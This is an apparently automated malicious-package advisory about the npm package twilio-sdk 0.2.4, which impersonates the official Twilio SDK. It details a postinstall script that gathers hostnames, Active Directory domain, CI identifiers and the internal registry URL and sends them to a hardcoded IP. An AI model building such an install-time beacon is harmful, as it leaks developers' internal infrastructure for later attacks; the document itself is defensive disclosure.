twilio-sdk @0.2.4

Summary

Package name twilio-sdk impersonates the official Twilio Node SDK ( twilio ) but ships an empty API ( module.exports = {} ). The only real behavior runs in postinstall.js, declared via package.json "postinstall": "node./postinstall.js" . On npm install , postinstall.js collects the installer's hostname, DNS-resolved FQDN, Active Directory domain ( USERDNSDOMAIN ), current working directory, Node version, CI flag, and CI/SCM identifiers ( GITHUB_REPOSITORY , CIRCLE_* , CI_PROJECT_PATH , BITBUCKET_REPO_FULL_NAME , BUILD_REPOSITORY_URI , TRAVIS_REPO_SLUG , JENKINS_URL , CI_SERVER_URL ), as well as the configured internal npm registry ( npm_config_registry ), and sends them as query parameters in a plaintext HTTP GET to http://46.224.67.169:3000/ping . The combination of name-squat against a top-tier SDK, divergent (empty) API, and an unconsented install-time beacon to a hardcoded bare IP is install-time reconnaissance for downstream targeting (dependency-confusion against the leaked internal registry, lateral movement using the leaked AD domain and internal CI URLs). The package's own README labeling it a 'security research honeypot' does not change the installer-side impact: any developer who mistypes twilio and installs this package leaks internal infrastructure identifiers to a third-party IP.

Source: amazon-inspector (737fede3d5b2007849cab0503cec191ce127c33c0b28f3b3285f347a064966e1)